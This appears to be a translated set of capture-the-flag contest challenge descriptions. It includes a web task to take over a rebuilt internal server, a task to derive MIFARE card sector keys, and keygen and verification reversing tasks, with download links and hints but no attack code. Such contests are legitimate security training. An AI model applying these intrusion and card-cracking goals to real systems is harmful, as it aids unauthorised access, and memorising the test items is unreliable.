(This flag is not in ACTF form, and the flag you submit does not need to contain brackets of any kind)
http://218.2.197.236:2003

Hint
Intelligence that can now be disclosed:
The admin is a very lazy person; his notes contain almost no filler.

WEB 500  Deranged Hacker

The server admin Xiao Lu set up got thoroughly owned (see web300), and the boss chewed Xiao Lu out. The boss then ordered Xiao Lu to set it up again, so Xiao Lu rebuilt the web300 site on some internal network with a different stack (the original was nginx) and patched some of the holes. Both the boss and Xiao Lu are users on that server, so whenever the boss finds that Xiao Lu has written vulnerable code again, it is promptly recorded on the server.

Take up the challenge, hackers: own this internal server at an unknown location!!!
(This challenge is closely tied to the earlier web challenges!!!)
(Some key files are reset every ten minutes!!!)
(The flag contains no ACTF marker and no brackets of any kind!!!)
(Drink All The Booze , Hack All The Things!!!)

Hint
Step one: find where the server is

REVERSE 800  Chaos

Download: http://pan.baidu.com/s/1i3GA4zr
Password: ophk

ATQA (SENS_RES): 00 04
UID (NFCID1): AD EA DC A7
SAK (SEL_RES): 08

Help this dead cat compute KeyA of sector 0 and KeyB of sector 3
Flag = ( Sector_0_KeyA + Sector_3_KeyB ).encode('hex').upper()

Hint
exported and non-exported entries can ease your life

Log => Code Path, Google => Document, Server => Secret, Reuse => No More Reverse

REVERSE 800  NonStandard

Link: http://pan.baidu.com/s/1pJO5QeZ Password: lk1d
If you can't write a keygen, you have no business calling yourself a reverser
Write a keygen and send it to ACTF.NonStandard@gmail.com; extra points for dealing with the hidden traps

Hint
Look at the title

REVERSE 800  Verify

Link: http://pan.baidu.com/s/1GOO3c Password: 6q9f

Hint
RTFM

Over